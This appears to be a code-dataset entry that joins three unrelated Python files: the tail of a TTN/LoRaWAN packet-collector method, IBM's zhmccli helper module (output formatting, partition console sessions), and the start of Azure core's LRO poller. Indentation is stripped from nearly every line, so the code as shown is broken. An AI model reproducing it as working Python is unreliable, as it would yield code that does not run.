if request:
# rx1_frequency is stored as freq, rx2_frequency isn't stored
packet['freq'] = int(request.get(
'rx1_frequency', None))/1000000
else:
packet['freq'] = None
packet['codr'] = None
packet['rfch'] = None
packet['modu'] = None
packet['datr'] = None
packet['size'] = None
packet['data'] = message_data.get('raw_payload')
if len(self.location) > 0:
packet['latitude'] = self.location['latitude']
packet['longitude'] = self.location['longitude']
packet['altitude'] = self.location['altitude']
# Reset location
self.location = {}
packet['app_name'] = None
packet['dev_name'] = None
identifiers = message.get('identifiers', None)
if identifiers:
packet['gateway'] = identifiers[0]['gateway_ids']['eui']
else:
packet['gateway'] = None
packet['gw_name'] = self.gateway_name
packet['seqn'] = None
packet['opts'] = None
packet['port'] = None
                # Ensure the dev_eui key exists even if it couldn't be parsed from raw_payload
if packet.get('dev_eui', None) is None:
packet['dev_eui'] = None
packet['date'] = datetime.now().__str__()
packet['data_collector_id'] = self.data_collector_id
packet['organization_id'] = self.organization_id
self.packet_writter_message['packet'] = packet
# Save the packet
save(self.packet_writter_message, self.data_collector_id)
# Reset this variable
self.packet_writter_message = self.init_packet_writter_message()
except Exception as e:
self.log.error(
f'Error creating Packet in TTNCollector ID {self.data_collector_id}: {str(e)} Message: {raw_message}')
save_parsing_error(self.data_collector_id, raw_message)
|
_helper.py
|
# Copyright 2016-2019 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Helper functions.
"""
from __future__ import absolute_import
import json
from collections import OrderedDict
import sys
import threading
import re
import six
import click
import click_spinner
from tabulate import tabulate
import zhmcclient
import zhmcclient_mock
# Importing readline makes interactive mode keep history
# pylint: disable=import-error,unused-import
if sys.platform == 'win32':
# The pyreadline package is supported only on Windows.
import pyreadline as readline # noqa: F401
else:
import readline # noqa: F401
# pylint: enable=import-error,unused-import
# Display of options in usage line
GENERAL_OPTIONS_METAVAR = '[GENERAL-OPTIONS]'
COMMAND_OPTIONS_METAVAR = '[COMMAND-OPTIONS]'
# File path of history file for interactive mode.
# If the file name starts with tilde (which is handled by the shell, not by
# the file system), it is properly expanded.
REPL_HISTORY_FILE = '~/.zhmc_history'
REPL_PROMPT = u'zhmc> ' # Must be Unicode
TABLE_FORMATS = ['table', 'plain', 'simple', 'psql', 'rst', 'mediawiki',
'html', 'latex']
LOG_DESTINATIONS = ['stderr', 'syslog', 'none']
LOG_LEVELS = ['error', 'warning', 'info', 'debug']
LOG_COMPONENTS = ['api', 'hmc', 'console', 'all']
SYSLOG_FACILITIES = ['user', 'local0', 'local1', 'local2', 'local3', 'local4',
'local5', 'local6', 'local7']
# Inner table format for each outer table format, when tables are nested for
# complex property types (arrays, nested objects). If a format is not mapped
# here, the outer table format will be used for the inner table.
# The table formats are the format indicators of the "tabulate" package (not
# the formats supported by zhmccli). In addition, the inner table formats may
# be 'repr' which indicates to use the repr() string on the input data for
# the inner table.
INNER_TABLE_FORMAT = {
'psql': 'plain',
'simple': 'plain',
'rst': 'grid',
'grid': 'grid',
'latex': 'repr',
# TODO on latex: Use latex_raw once "tabulate" can better control escaping
# mediawiki: uses nested mediawiki tables
# html: uses nested html tables
}
# Common Click options for list commands
LIST_OPTIONS = [
click.option('--names-only', is_flag=True, required=False,
help='Restrict properties shown to only the names of the '
'resource and its parents'),
click.option('--uri', is_flag=True, required=False,
help='Add the resource URI to the properties shown'),
click.option('--all', is_flag=True, required=False,
help='Show all properties'),
]
# Click options for email notification (used for storagegroup and storagevolume
# commands)
EMAIL_OPTIONS = [
click.option('--email-to-address', type=str, required=False, multiple=True,
help='An email address for the people that are to be notified '
'via email of any fulfillment actions caused by this '
'command. These email addresses will appear in the "to:" '
'address list in the email that is sent. '
'Can be specified multiple times. '
'Default: No email will be sent'),
click.option('--email-cc-address', type=str, required=False, multiple=True,
help='An email address for the people that are to be notified '
'via email of any fulfillment actions caused by this '
'command. These email addresses will appear in the "cc:" '
'address list in the email that is sent. '
'Can be specified multiple times. '
'Default: The "cc:" address list of the email will be empty'),
click.option('--email-insert', type=str, required=False,
help='Text that is to be inserted in the email notification '
'of any fulfillment actions caused by this command. '
'The text can include HTML formatting tags. '
'Default: The email will have no special text insert'),
]
# Click options used for commands that wait for completion of asynchronous HMC
# operations
ASYNC_TIMEOUT_OPTIONS = [
click.option('-T', '--operation-timeout', type=int, required=False,
help='Operation timeout in seconds when waiting for '
'completion of asynchronous HMC operations. '
'Default: {def_ot}'.
format(def_ot=zhmcclient.DEFAULT_OPERATION_TIMEOUT)),
]
def abort_if_false(ctx, param, value):
"""
Click callback function that aborts the current command if the option
value is false.
    Because this is used as a reaction to an interactive confirmation question,
    we always issue the error message in a human readable format (i.e. we
    ignore the specified error format).
    Note that abort mechanisms such as ctx.abort() or raising click.Abort
    terminate the CLI completely, not just the current command. This makes
    a difference in interactive mode.
Parameters:
ctx (:class:`click.Context`): The click context object. Created by the
``@click.pass_context`` decorator.
    param (:class:`click.Option`): The click option that used this callback.
value: The option value to be tested.
"""
# pylint: disable=unused-argument
if not value:
# click.ClickException seems to be the only reasonable exception we
# can raise here, but it prefixes the error text with 'Error: ', which
# is confusing in this case, because the user simply decided to abort.
# We therefore play the trick with overwriting that prefix.
raise click.ClickException("\rAborted!")
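# A minimal sketch of how this callback is typically wired up (the option
# name and prompt text are illustrative, not taken from this project):
#
#     @click.option('--yes', is_flag=True, callback=abort_if_false,
#                   expose_value=False,
#                   prompt='Are you sure you want to delete it?')
#     def delete(...):
#         ...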
class InvalidOutputFormatError(click.ClickException):
"""
Exception indicating an invalid output format for zhmc.
"""
def __init__(self, output_format):
msg = "Invalid output format: {of}".format(of=output_format)
super(InvalidOutputFormatError, self).__init__(msg)
class CmdContext(object):
"""
A context object we attach to the :class:`click.Context` object in its
``obj`` attribute. It is used to provide command line options and other
data.
"""
def __init__(self, host, userid, password, no_verify, ca_certs,
output_format, transpose, error_format, timestats, session_id,
get_password):
self._host = host
self._userid = userid
self._password = password
self._no_verify = no_verify
self._ca_certs = ca_certs
self._output_format = output_format
self._transpose = transpose
self._error_format = error_format
self._timestats = timestats
self._session_id = session_id
self._get_password = get_password
self._session = None
self._spinner = click_spinner.Spinner()
def __repr__(self):
ret = "CmdContext(at 0x{ctx:08x}, host={s._host!r}, " \
"userid={s._userid!r}, password={pw!r}, " \
"no_verify={s._no_verify!r}, ca_certs={s._ca_certs!r}, " \
"output_format={s._output_format!r}, transpose={s._transpose!r}, " \
"error_format={s._error_format!r}, timestats={s._timestats!r}," \
"session_id={s._session_id!r}, session={s._session!r}, ...)". \
format(ctx=id(self), s=self, pw='...' if self._password else None)
return ret
@property
def host(self):
"""
:term:`string`: Hostname or IP address of the HMC.
"""
return self._host
@property
def userid(self):
"""
:term:`string`: Userid on the HMC.
"""
return self._userid
@property
def no_verify(self):
"""
bool: Do not verify the server certificate presented by the HMC
during SSL/TLS handshake.
"""
return self._no_verify
@property
def ca_certs(self):
"""
:term:`string`: Path name of certificate file or directory with CA
certificates for verifying the HMC certificate. If `None`, the
zhmcclient will be set up to use the 'certifi' package.
"""
return self._ca_certs
@property
def output_format(self):
"""
:term:`string`: Output format to be used.
"""
return self._output_format
@property
def transpose(self):
"""
bool: Transpose the output table.
"""
return self._transpose
@property
def error_format(self):
"""
:term:`string`: Error message format to be used.
"""
return self._error_format
@property
def timestats(self):
"""
bool: Indicates whether time statistics should be printed.
"""
return self._timestats
@property
def session_id(self):
"""
:term:`string` or :class:`~zhmcclient_mock.FakedSession`:
If string: Session-id of real session to be used.
If `None`: Create a new real session using host, userid, password.
If FakedSession: Faked session to be used.
"""
return self._session_id
@property
def get_password(self):
"""
:term:`callable`: Password retrieval function, or `None`.
"""
return self._get_password
@property
def session(self):
"""
The session to be used, or `None` if a session has not yet been
created. The session may be a :class:`zhmcclient.Session` or
:class:`zhmcclient_mock.FakedSession` object.
"""
return self._session
@property
def spinner(self):
"""
:class:`~click_spinner.Spinner` object.
Since click_spinner 0.1.5, the Spinner object takes care of suppressing
the spinner when not on a tty, and is able to suspend/resume the
spinner via its stop() and start() methods.
"""
return self._spinner
def execute_cmd(self, cmd):
"""
Execute the command.
"""
if self._session is None:
if isinstance(self._session_id, zhmcclient_mock.FakedSession):
self._session = self._session_id
else:
if self._host is None:
raise click_exception("No HMC host provided",
self._error_format)
if self._no_verify:
verify_cert = False
elif self._ca_certs is None:
verify_cert = True # Use 'certifi' package
else:
verify_cert = self._ca_certs
self._session = zhmcclient.Session(
self._host, self._userid, self._password,
session_id=self._session_id,
get_password=self._get_password,
verify_cert=verify_cert)
if self.timestats:
self._session.time_stats_keeper.enable()
self.spinner.start()
try:
cmd()
except zhmcclient.Error as exc:
raise click_exception(exc, self.error_format)
finally:
self.spinner.stop()
if self._session.time_stats_keeper.enabled:
click.echo(self._session.time_stats_keeper)
def original_options(options):
"""
Return the input options with their original names.
This is used to undo the name change the click package applies
automatically before passing the options to the function that was decorated
with 'click.option()'. The original names are needed in case there is
special processing of the options on top of 'options_to_properties()'.
The original names are constructed by replacing any underscores '_' with
hyphens '-'. This approach may not be perfect in general, but it works for
the zhmc CLI because the original option names do not have any underscores.
Parameters:
options (dict): The click options dictionary as passed to the decorated
function by click (key: option name as changed by click, value: option
value).
Returns:
dict: Options with their original names.
"""
org_options = {}
for name, value in six.iteritems(options):
org_name = name.replace('_', '-')
org_options[org_name] = value
return org_options
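# For example (a sketch): click passes {'names_only': True, 'uri': False},
# and original_options() returns {'names-only': True, 'uri': False}.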
def options_to_properties(options, name_map=None):
"""
Convert click options into HMC resource properties.
The click option names in input parameters to this function are the
original option names (e.g. as produced by `original_options()`.
Options with a value of `None` are not added to the returned resource
properties.
If a name mapping dictionary is specified, the option names are mapped
using that dictionary. If an option name is mapped to `None`, it is not
going to be added to the set of returned resource properties.
Parameters:
options (dict): The options dictionary (key: original option name,
value: option value).
name_map (dict): `None` or name mapping dictionary (key: original
option name, value: property name, or `None` to not add this option to
the returned properties).
Returns:
dict: Resource properties (key: property name, value: option value)
"""
properties = {}
for name, value in six.iteritems(options):
if value is None:
continue
if name_map:
name = name_map.get(name, name)
if name is not None:
properties[name] = value
return properties
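# For example (a sketch with illustrative values): with
#     options = {'name': 'sg1', 'size': None, 'email-insert': 'hi'}
#     name_map = {'email-insert': None}
# the result is {'name': 'sg1'}: 'size' is dropped because its value is
# None, and 'email-insert' is excluded because it is mapped to None.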
def print_properties(cmd_ctx, properties, output_format, show_list=None):
"""
Print properties in the desired output format.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
properties (dict): The properties.
output_format (string): Output format from the command line.
show_list (iterable of string): The property names to be shown.
If `None`, all properties are shown.
"""
if output_format in TABLE_FORMATS:
if output_format == 'table':
output_format = 'psql'
print_properties_as_table(cmd_ctx, properties, output_format, show_list)
elif output_format == 'json':
print_properties_as_json(cmd_ctx, properties, show_list)
else:
raise InvalidOutputFormatError(output_format)
def print_resources(
cmd_ctx, resources, output_format, show_list=None, additions=None,
all=False):
# pylint: disable=redefined-builtin
"""
Print the properties of a list of resources in the desired output format.
While accessing the properties of the resources, they are fetched from
the HMC as needed.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
resources (iterable of BaseResource):
The resources.
output_format (string): Output format from command line.
show_list (iterable of string):
The property names to be shown. If a property is not in the resource
object, it will be retrieved from the HMC. This iterable also defines
the order of columns in the table, from left to right in iteration
order.
If `None`, all properties in the resource objects are shown, and their
column order is ascending by property name.
additions (dict of dict of values): Additional properties,
as a dict keyed by the property name (which also needs to be listed in
`show_list`),
whose value is a dict keyed by the resource URI,
whose value is the value to be shown.
If `None`, no additional properties are defined.
all (bool): Add all remaining properties in sorted order.
Raises:
InvalidOutputFormatError
zhmcclient.HTTPError
zhmcclient.ParseError
zhmcclient.AuthError
zhmcclient.ConnectionError
"""
if output_format in TABLE_FORMATS:
if output_format == 'table':
output_format = 'psql'
print_resources_as_table(
cmd_ctx, resources, output_format, show_list, additions, all)
elif output_format == 'json':
print_resources_as_json(cmd_ctx, resources, show_list, additions, all)
else:
raise InvalidOutputFormatError(output_format)
def print_properties_as_table(
cmd_ctx, properties, table_format, show_list=None):
"""
Print properties in tabular output format.
The order of rows is ascending by property name.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
properties (dict): The properties.
table_format (string): Supported table formats are:
- "table" -> same like "psql"
- "plain"
- "simple"
- "psql"
- "rst"
- "mediawiki"
- "html"
- "latex"
show_list (iterable of string): The property names to be shown.
If `None`, all properties are shown.
"""
headers = ['Field Name', 'Value']
out_str = dict_as_table(properties, headers, table_format, show_list)
cmd_ctx.spinner.stop()
click.echo(out_str)
def print_resources_as_table(
cmd_ctx, resources, table_format, show_list=None, additions=None,
all=False):
# pylint: disable=redefined-builtin
"""
Print resources in tabular output format.
While accessing the properties of the resources, they are fetched from
the HMC as needed.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
resources (iterable of BaseResource):
The resources.
table_format (string): Supported table formats are:
- "table" -> same like "psql"
- "plain"
- "simple"
- "psql"
- "rst"
- "mediawiki"
- "html"
- "latex"
show_list (iterable of string):
The property names to be shown. If a property is not in the resource
object, it will be retrieved from the HMC. This iterable also defines
the order of columns in the table, from left to right in iteration
order.
If `None`, all properties in the resource objects are shown, and their
column order is ascending by property name.
additions (dict of dict of values): Additional properties,
as a dict keyed by the property name (which also needs to be listed in
`show_list`),
whose value is a dict keyed by the resource URI,
whose value is the value to be shown.
If `None`, no additional properties are defined.
all (bool): Add all remaining properties in sorted order.
Raises:
zhmcclient.HTTPError
zhmcclient.ParseError
zhmcclient.AuthError
zhmcclient.ConnectionError
"""
inner_format = INNER_TABLE_FORMAT.get(table_format, table_format)
prop_names = OrderedDict() # key: property name, value: None
remaining_prop_names = OrderedDict() # key: property name, value: None
resource_props_list = []
for resource in resources:
resource_props = {}
if show_list:
for name in show_list:
if additions and name in additions:
value = additions[name][resource.uri]
else:
# May raise zhmcclient exceptions
value = resource.prop(name)
resource_props[name] = value
prop_names[name] = None
else:
for name in sorted(resource.properties.keys()):
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
prop_names[name] = None
if all:
resource.pull_full_properties()
for name in resource.properties.keys():
if name not in prop_names:
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
remaining_prop_names[name] = None
resource_props_list.append(resource_props)
prop_names = list(prop_names.keys()) + sorted(remaining_prop_names)
table = []
for resource_props in resource_props_list:
row = []
for name in prop_names:
value = resource_props.get(name, None)
value = value_as_table(value, inner_format)
row.append(value)
table.append(row)
cmd_ctx.spinner.stop()
if not table:
click.echo("No resources.")
else:
sorted_table = sorted(table, key=lambda row: row[0])
out_str = tabulate(sorted_table, prop_names, tablefmt=table_format)
click.echo(out_str)
def dict_as_table(data, headers, table_format, show_list=None):
"""
Return a string with the dictionary data in tabular output format.
The order of rows is ascending by dictionary key.
Parameters:
data (dict): The dictionary data.
headers (list): The text for the header row. `None` means no header row.
table_format: Table format, see print_resources_as_table().
show_list (iterable of string): The dict keys to be shown.
If `None`, all dict keys are shown.
"""
if table_format == 'repr':
ret_str = repr(data)
else:
table = []
inner_format = INNER_TABLE_FORMAT.get(table_format, table_format)
sorted_fields = sorted(data)
for field in sorted_fields:
if show_list is None or field in show_list:
value = value_as_table(data[field], inner_format)
table.append((field, value))
ret_str = tabulate(table, headers, tablefmt=table_format)
return ret_str
def list_as_table(data, table_format):
"""
Return a string with the list data in tabular output format.
The order of rows is the order of items in the list.
Parameters:
data (list): The list data.
table_format: Table format, see print_resources_as_table().
"""
if table_format == 'repr':
ret_str = repr(data)
else:
table = []
inner_format = INNER_TABLE_FORMAT.get(table_format, table_format)
for value in data:
value = value_as_table(value, inner_format)
table.append((value,))
ret_str = tabulate(table, headers=[], tablefmt=table_format)
return ret_str
def value_as_table(value, table_format):
"""
Return the value in the table format.
Parameters:
value (dict or list or simple type): The value to be converted.
table_format (string): The table format to be used.
Returns:
string or simple type: The value in the table format.
"""
if isinstance(value, list):
value = list_as_table(value, table_format)
elif isinstance(value, (dict, OrderedDict)):
value = dict_as_table(value, [], table_format)
else:
# format the single value
# TODO: Make the formatting less hard coded.
if isinstance(value, float):
value = '{0:.2f}'.format(value)
return value
def print_properties_as_json(cmd_ctx, properties, show_list=None):
"""
Print properties in JSON output format.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
properties (dict): The properties.
show_list (iterable of string):
The property names to be shown. The property name must be in the
`properties` dict.
If `None`, all properties in the `properties` dict are shown.
"""
show_properties = OrderedDict()
for pname in properties:
if show_list is None or pname in show_list:
show_properties[pname] = properties[pname]
json_str = json.dumps(show_properties)
cmd_ctx.spinner.stop()
click.echo(json_str)
def print_resources_as_json(
cmd_ctx, resources, show_list=None, additions=None, all=False):
# pylint: disable=redefined-builtin
"""
Print resources in JSON output format.
While accessing the properties of the resources, they are fetched from
the HMC as needed.
The spinner is stopped just before printing.
Parameters:
cmd_ctx (CmdContext): Context object of the command.
resources (iterable of BaseResource):
The resources.
show_list (iterable of string):
The property names to be shown. If a property is not in a resource
object, it will be retrieved from the HMC.
If `None`, all properties in the input resource objects are shown.
additions (dict of dict of values): Additional properties,
as a dict keyed by the property name (which also needs to be listed in
`show_list`),
whose value is a dict keyed by the resource URI,
whose value is the value to be shown.
If `None`, no additional properties are defined.
all (bool): Add all remaining properties in sorted order.
Raises:
zhmcclient.HTTPError
zhmcclient.ParseError
zhmcclient.AuthError
zhmcclient.ConnectionError
"""
prop_names = OrderedDict() # key: property name, value: None
resource_props_list = []
for resource in resources:
resource_props = {}
if show_list:
for name in show_list:
if additions and name in additions:
value = additions[name][resource.uri]
else:
# May raise zhmcclient exceptions
value = resource.prop(name)
resource_props[name] = value
prop_names[name] = None
else:
for name in sorted(resource.properties.keys()):
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
prop_names[name] = None
if all:
resource.pull_full_properties()
for name in resource.properties.keys():
if name not in prop_names:
# May raise zhmcclient exceptions
resource_props[name] = resource.prop(name)
prop_names[name] = None
resource_props_list.append(resource_props)
json_obj = []
for resource_props in resource_props_list:
json_res = OrderedDict()
for name in prop_names:
value = resource_props.get(name, None)
json_res[name] = value
json_obj.append(json_res)
json_str = json.dumps(json_obj)
cmd_ctx.spinner.stop()
click.echo(json_str)
class ExceptionThread(threading.Thread):
"""
A thread class derived from :class:`py:threading.Thread` that handles
exceptions that are raised in the started thread, by re-raising them in
the thread that joins the started thread.
The thread function needs to be specified with the 'target' init argument.
"""
def __init__(self, *args, **kwargs):
super(ExceptionThread, self).__init__(*args, **kwargs)
self.exc_info = None
def run(self):
"""
Call inherited run() and save exception info.
"""
try:
super(ExceptionThread, self).run()
except Exception: # noqa: E722 pylint: disable=broad-except
self.exc_info = sys.exc_info()
def join(self, timeout=None):
"""
Call inherited join() and reraise exception if exception info was saved.
"""
super(ExceptionThread, self).join(timeout)
if self.exc_info:
six.reraise(*self.exc_info)
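# A minimal usage sketch (names are illustrative): an exception raised in
# the thread function surfaces in the joining thread:
#
#     def work():
#         raise RuntimeError("boom")
#
#     t = ExceptionThread(target=work)
#     t.start()
#     t.join()  # re-raises the RuntimeError here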
def console_log(logger, prefix, message, *args, **kwargs):
"""
Log a message after prepending it with a prefix, to the specified logger
using the debug log level.
"""
message = prefix + message
logger.debug(message, *args, **kwargs)
def display_messages(receiver, logger, prefix):
"""
Receive the OS message notifications in the specified receiver and
print them to stdout. The function returns when the receiver is
exhausted (which happens when it is closed).
Due to inconsistencies in the message text w.r.t. newline, some processing
is performed regarding trailing newlines.
"""
console_log(logger, prefix, "Message display thread has started")
for headers, message in receiver.notifications():
console_log(logger, prefix,
"Received OS message notification "
"session-sequence-nr=%s", headers['session-sequence-nr'])
for msg_info in message['os-messages']:
msg_txt = msg_info['message-text']
console_log(logger, prefix,
"Message id=%s, os=%r, refresh=%r, prompt=%r: %r",
msg_info['message-id'], msg_info['os-name'],
msg_info['is-refresh'], msg_info['prompt-text'],
msg_txt)
is_prompt = re.match(r'^.*[\$#] ?$', msg_txt)
is_login = re.match(r'^.*[Ll]ogin: ?$', msg_txt)
is_password = re.match(r'^[Pp]assword: *$', msg_txt)
if is_prompt or is_login or is_password:
msg_txt = msg_txt.rstrip('\n')
else:
if not msg_txt.endswith('\n'):
msg_txt += '\n'
click.echo(msg_txt, nl=False)
console_log(logger, prefix, "Message display thread is ending")
def part_console(session, part, refresh, logger):
"""
Establish an interactive shell to the console of the operating system
running in a partition or LPAR.
Any incoming OS messages of the console are printed concurrently with
waiting for and sending the next command.
The shell ends and this function returns if one of the exit commands
is entered.
Parameters:
session (Session): HMC session supplying the credentials.
part (Partition or Lpar): Resource object for the partition or LPAR.
refresh (bool): Include refresh messages.
logger (Logger): Python logger for any log messages.
Raises:
Exceptions derived from zhmcclient.Error
AssertionError
"""
if isinstance(part, zhmcclient.Partition):
part_term = 'partition'
else:
part_term = 'LPAR'
cpc = part.manager.parent
prefix = "{c} {p} ".format(c=cpc.name, p=part.name)
console_log(logger, prefix, "Operating system console session opened")
console_log(logger, prefix, "Include refresh messages: %s", refresh)
try:
topic = part.open_os_message_channel(include_refresh_messages=refresh)
console_log(logger, prefix, "Using new notification topic: %s", topic)
except zhmcclient.HTTPError as exc:
if exc.http_status == 409 and exc.reason == 331:
# Notification topic for this partition already exists, use it
topic_dicts = session.get_notification_topics()
topic = None
for topic_dict in topic_dicts:
if topic_dict['topic-type'] != 'os-message-notification':
continue
obj_uri = topic_dict['object-uri']
if part.uri in (obj_uri, '/api/partitions/' + obj_uri):
topic = topic_dict['topic-name']
console_log(logger, prefix,
"Using existing notification topic: %s "
"(object-uri: %s)", topic, obj_uri)
break
assert topic, \
"An OS message notification topic for {pt} {pn} (uri={pu}) " \
"supposedly exists, but cannot be found in the existing " \
"topics: {t})". \
format(pt=part_term, pn=part.name, pu=part.uri, t=topic_dicts)
else:
raise
# pylint: disable=protected-access
if not session._password:
# pylint: disable=protected-access
session._password = click.prompt(
"Enter password (for user {s.userid} at HMC {s.host})"
.format(s=session),
hide_input=True, confirmation_prompt=False, type=str, err=True)
# pylint: disable=protected-access
receiver = zhmcclient.NotificationReceiver(
topic, session.host, session.userid, session._password)
msg_thread = ExceptionThread(
target=display_messages, args=(receiver, logger, prefix))
click.echo("Connected to operating system console for {pt} {pn}".
format(pt=part_term, pn=part.name))
click.echo("Enter ':exit' or press <CTRL-C> or <CTRL-D> to exit.")
console_log(logger, prefix, "Starting message display thread")
msg_thread.start()
while True:
try:
            # This has history/editing support when readline is imported
line = six.moves.input()
except EOFError:
# CTRL-D was pressed
reason = "CTRL-D"
break
except KeyboardInterrupt:
# CTRL-C was pressed
reason = "CTRL-C"
break
if line == ':exit':
reason = "{c} command".format(c=line)
break
if line == '':
# Enter was pressed without other input.
# The HMC requires at least one character in the command, otherwise
# it returns an error.
line = ' '
part.send_os_command(line, is_priority=False)
console_log(logger, prefix,
"User requested to exit the console session via %s", reason)
console_log(logger, prefix, "Closing notification receiver")
# This causes the notification receiver to be exhausted, and in turn causes
# the message display thread to end.
receiver.close()
console_log(logger, prefix, "Waiting for message display thread to end")
msg_thread.join()
console_log(logger, prefix, "Operating system console session closed")
click.echo("\nConsole session closed.")
def click_exception(exc, error_format):
"""
Return a ClickException object with the message from an input exception
in a desired error message format.
Parameters:
exc (exception or string):
The exception or the message.
error_format (string):
The error format (see ``--error-format`` general option).
Returns:
click.ClickException: The new exception.
"""
if error_format == 'def':
if isinstance(exc, zhmcclient.Error):
error_str = exc.str_def()
else:
assert isinstance(exc, six.string_types)
error_str = "classname: None, message: {msg}".format(msg=exc)
else:
assert error_format == 'msg'
if isinstance(exc, zhmcclient.Error):
error_str = "{exc}: {msg}".format(
exc=exc.__class__.__name__, msg=exc)
else:
assert isinstance(exc, six.string_types)
error_str = exc
new_exc = click.ClickException(error_str)
new_exc.__cause__ = None
return new_exc
def add_options(click_options):
"""
Decorator that adds multiple Click options to the decorated function.
The list is reversed because of the way Click processes options.
Note: This function has its origins in the
https://github.com/pywbem/pywbemtools project (Apache 2.0 license)
Parameters:
click_options (list): List of `click.option` objects.
"""
def _add_options(func):
"""
Apply the Click options to the function in reversed order.
"""
for option in reversed(click_options):
func = option(func)
return func
return _add_options
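# A minimal usage sketch (the surrounding command group 'cli' is an
# illustrative placeholder): applying the common list options defined
# above to a command in one line:
#
#     @cli.command('list')
#     @add_options(LIST_OPTIONS)
#     @click.pass_context
#     def foo_list(ctx, **options):
#         ...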
def storage_management_feature(cpc_or_partition):
"""
Return a boolean indicating whether the specified CPC, or the CPC of the
specified partition has the DPM storage management feature enabled.
    On z13 and earlier, the storage management feature is always disabled.
    On z14 and later, the storage management feature is always enabled.
    Nevertheless, this function performs the proper lookup of the feature.
"""
features = cpc_or_partition.prop('available-features-list', [])
for f in features:
if f['name'] == 'dpm-storage-management':
return f['state']
return False
def hide_property(properties, prop_name):
"""
Hide a property, if it exists and is not empty.
This is done by modifying the value of the property in the 'properties'
parameter.
Parameters:
properties(dict): Dict of properties (name/value). May be changed.
prop_name(string): Property name to hide
"""
if prop_name in properties and properties[prop_name]:
properties[prop_name] = "... (hidden)"
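# For example (with an illustrative property name):
#     props = {'ssc-master-pw': 'secret123'}
#     hide_property(props, 'ssc-master-pw')  # value becomes "... (hidden)"
# Absent or empty properties are left untouched.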
|
_poller.py
|
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import base64
import threading
import uuid
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from typing import TYPE_CHECKING, TypeVar, Generic
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
from typing import Any, Callable, Union, List, Optional, Tuple
PollingReturnType = TypeVar("PollingReturnType")
class PollingMethod(Generic[PollingReturnType]):
"""ABC class for polling method.
"""
def initialize(self, client, initial_response, deserialization_callback):
# type: (Any, Any, Any) -> None
raise NotImplementedError("This method needs to be implemented")
def run(self):
# type: () -> None
raise NotImplementedError("This method needs to be implemented")
def status(self):
# type: () -> str
raise NotImplementedError("This method needs to be implemented")
def finished(self):
# type: () -> bool
raise NotImplementedError("This method needs to be implemented")
def resource(self):
# type: () -> PollingReturnType
raise NotImplementedError("This method needs to be implemented")
def get_continuation_token(self):
        # type: () -> str
raise TypeError(
"Polling method '{}' doesn't support get_continuation_token".format(
self.__class__.__name__
)
)
@classmethod
def from_continuation_token(cls, continuation_token, **kwargs):
        # type: (str, Any) -> Tuple[Any, Any, Callable]
raise TypeError(
"Polling method '{}' doesn't support from_continuation_token".format(
cls.__name__
)
)
class NoPolling(PollingMethod):
"""An empty poller that returns the deserialized initial response.
"""
def __init__(self):
self._initial_response = None
self._deserialization_callback = None
def initialize(self, _, initial_response, deserialization_callback):
# type: (Any, Any, Callable) -> None
self._initial_response = initial_response
self._deserialization_callback = deserialization_callback
def run(self):
# type: () -> None
"""Empty run, no polling.
"""
def status(self):
# type: () -> str
"""Return the current status as a string.
:rtype: str
"""
return "succeeded"
def finished(self):
# type: () -> bool
"""Is this polling finished?
:rtype: bool
"""
return True
def resource(self):
# type: () -> Any
return self._deserialization_callback(self._initial_response)
def get_continuation_token(self):
        # type: () -> str
import pickle
return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii')
@classmethod
def from_continuation_token(cls, continuation_token, **kwargs):
        # type: (str, Any) -> Tuple
try:
deserialization_callback = kwargs["deserialization_callback"]
except KeyError:
raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token")
import pickle
initial_response = pickle.loads(base64.b64decode(continuation_token))
return None, initial_response, deserialization_callback
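    # Continuation-token round trip (a sketch; 'method' and 'cb' are
    # illustrative): get_continuation_token() pickles and base64-encodes the
    # initial response, and from_continuation_token() reverses it:
    #
    #     token = method.get_continuation_token()
    #     _, initial, cb2 = NoPolling.from_continuation_token(
    #         token, deserialization_callback=cb)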
class LROPoller(Generic[PollingReturnType]):
"""Poller for long running operations.
:param client: A pipeline service client
:type client: ~azure.core.PipelineClient
:param initial_response: The initial call response
:type initial_response: ~azure.core.pipeline.PipelineResponse
:param deserialization_callback: A callback that takes a Response and return a deserialized object.
If a subclass of Model is given, this passes "deserialize" as callback.
:type deserialization_callback: callable or msrest.serialization.Model
:param polling_method: The polling strategy to adopt
